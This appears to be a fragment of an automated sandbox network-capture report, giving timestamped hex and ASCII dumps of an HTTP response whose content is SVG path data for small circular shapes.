                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M952.8,314.28a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC701INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 35 38 2c 32 35 31 2e 36 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 32 38 2c 32 34 32 2e 38 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30
                                                                                                                                                                                                                                                        Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M59.58,251.63a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M59.28,242.85a2.18,2.18,0,0
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC717INData Raw: 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2c 33 30 33 2e 30 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d
                                                                                                                                                                                                                                                        Data Ascii: 8,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M97,303.09a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC733INData Raw: 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 35 36 2c 31 31 37 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 32 36 2c 31 30 39 2e 30 35 61 32 2e 31 38 2c 32 2e 31 38 2c
                                                                                                                                                                                                                                                        Data Ascii: 6,2.86,2.86,0,0,1,3.67,0,2.67,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M117.56,117.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M117.26,109.05a2.18,2.18,
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC749INData Raw: 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 33 31 2c 31 37 38 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2c 31
                                                                                                                                                                                                                                                        Data Ascii: 1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.31,178.08a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.67,2.67,0,0,1,.2,3.62"/><path class="cls-7" d="M155,1
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC765INData Raw: 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 30 37 2c 32 33 38 2e 33 32 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 32 2e 37 37 2c 32 32 39 2e 35 34 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c
                                                                                                                                                                                                                                                        Data Ascii: 0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M193.07,238.32a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M192.77,229.54a2.17,2.17,0,0,1-1,2.83,3.18,
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC781INData Raw: 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 38 33 2c 32 39 38 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 35
                                                                                                                                                                                                                                                        Data Ascii: 1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M230.83,298.57a2.19,2.19,0,0,1-1,2.83,3.2,3.2,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M230.5
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC797INData Raw: 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 33 35 2c 31 31 33 2e 33 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                        Data Ascii: 3-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M251.35,113.31a2.17,2.17,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC813INData Raw: 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 31 2c 31 37 33 2e 35 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                        Data Ascii: 1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M289.1,173.55a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.66,2.66,0,0,1,.2,3.61"/><path class="
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC829INData Raw: 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 36 2e 38 36 2c 32 33 33 2e 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c
                                                                                                                                                                                                                                                        Data Ascii: ,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M326.86,233.8a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC878INData Raw: 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 36 32 2c 32 39 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                                                                                                        Data Ascii: 18,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M364.62,294a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path cla
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC894INData Raw: 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 36 34 2c 32 30 32 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 33 37 2c 31 39 34 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: ass="cls-9" d="M290.64,202.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M290.37,194.29a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC910INData Raw: 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 38 33 2c 32 34 31 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 35 36 2c 32 33 33
                                                                                                                                                                                                                                                        Data Ascii: 8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.83,241.65a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.88-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.56,233
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC926INData Raw: 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2e 33 2c 32 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2e 30 35 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2c 32 38 30 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                        Data Ascii: 38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M359.3,289a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.62,2.62,0,0,1,3.37.05,2.45,2.45,0,0,1,.18,3.32"/><path class="cls-9" d="M359,280.92a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC942INData Raw: 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 33 2e 34 39 2c 33 32 38 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c
                                                                                                                                                                                                                                                        Data Ascii: 1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M393.49,328.28a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC958INData Raw: 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 38 2c 33 37 35 2e 36 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 37 2e 36 39 2c 33 36 37 2e 35 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33
                                                                                                                                                                                                                                                        Data Ascii: ><path class="cls-9" d="M428,375.63a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"/><path class="cls-9" d="M427.69,367.56a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.3
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC974INData Raw: 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 36 2e 32 39 2c 31 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d
                                                                                                                                                                                                                                                        Data Ascii: 3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M446.29,189a2,2,0,0,1-.9,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d=
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC990INData Raw: 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 30 2e 34 39 2c 32 32 38 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31
